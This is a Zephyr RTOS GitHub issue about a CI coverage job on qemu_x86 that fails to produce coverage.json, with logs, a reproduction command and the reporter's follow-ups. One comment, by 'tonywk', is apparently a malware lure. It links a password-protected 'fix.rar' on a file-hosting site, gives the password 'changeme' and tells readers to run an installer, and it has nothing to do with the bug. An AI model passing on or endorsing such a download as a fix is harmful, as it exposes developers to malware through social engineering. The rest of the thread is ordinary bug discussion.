zephyrproject-rtos/zephyr #77561: Coverage: Issue with qemu_x86 on codecov.yaml.

gbarkadiusz, 2024-08-26:
**Describe the bug**
Although a couple of tests are failing on qemu_x86 while running codecov.yaml, the log says that the report has been generated properly.
```
INFO    - Saving reports...
INFO    - Writing JSON report /__w/zephyr/zephyr/twister-out/twister.json
INFO    - Writing xunit report /__w/zephyr/zephyr/twister-out/twister.xml...
INFO    - Writing xunit report /__w/zephyr/zephyr/twister-out/twister_report.xml...
INFO    - -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
INFO    - The following issues were found (showing the top 10 items):
INFO    - 1) tests/subsys/debug/coredump_backends/debug.coredump.backends.flash on qemu_x86 failed (Testsuite failed)
INFO    - 2) tests/subsys/shell/shell_backend_uart/shell.backend.uart on qemu_x86 failed (Testsuite failed)
INFO    - 3) tests/subsys/logging/log_benchmark/logging.benchmark_user on qemu_x86 failed (unexpected eof)
INFO    - 4) tests/subsys/logging/dictionary/logging.dictionary on qemu_x86 failed (1/1 pytest scenario(s) failed)
INFO    - 5) tests/subsys/logging/dictionary/logging.dictionary.fpu on qemu_x86 failed (1/1 pytest scenario(s) failed)
INFO    - 6) tests/subsys/portability/cmsis_rtos_v1/portability.cmsis_rtos_v1 on qemu_x86 failed (unexpected eof)
INFO    - 7) tests/ztest/ztest_param/testing.ztest.ztest_params.ztest_params on qemu_x86 failed (8/8 pytest scenario(s) failed)
INFO    - 8) tests/lib/devicetree/api/libraries.devicetree.api on qemu_x86 error (Build failure)
INFO    - 9) tests/arch/x86/static_idt/arch.x86.interrupt on qemu_x86 failed (unexpected eof)
INFO    - 10) tests/net/dhcpv6/net.dhcpv6 on qemu_x86 error (Build failure)
```
But the next step (Rename coverage files) throws exception:
`mv: cannot stat 'twister-out/coverage.json': No such file or directory`

There's not reproduction locally.
**To Reproduce**
```
/scripts/twister -i --force-color -N -v --filter runnable -p qemu_x86 --coverage -T tests/kernel --coverage-tool gcovr -xCONFIG_TEST_EXTRA_STACK_SIZE=4096 -e nano --timeout-multiplier 2
```
` ls ./twister-out/`
`coverage  coverage.json  coverage.log  qemu_x86  testplan.json  twister.json  twister.log  twister_report.xml  twister_suite_report.xml  twister.xml  ztest.json`

**Expected behavior**
Gcov should generates coverage.json file.

**Impact**
Incomplete coverage data.

**Logs and console output**
https://github.com/zephyrproject-rtos/zephyr/actions/runs/10554805417/job/29237262201

**Environment (please complete the following information):**

 - OS: Linux
 - Toolchain gcovr-6.0
 - Commit SHA or Version used: v3.7.0-1625-gf29377a12cb5

tonywk, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

gbarkadiusz, 2024-09-03:
Qemu_x86 unexpectedly passed the run correctly but only once.
https://github.com/zephyrproject-rtos/zephyr/actions/runs/10662014363/job/29548471249
The next ones failed.

gbarkadiusz, 2024-09-04:
Short update.
We've got the success runs again.
https://github.com/zephyrproject-rtos/zephyr/actions/runs/10696359045
https://github.com/zephyrproject-rtos/zephyr/actions/runs/10662014363

closed 2024-09-23 by fabiobaltieri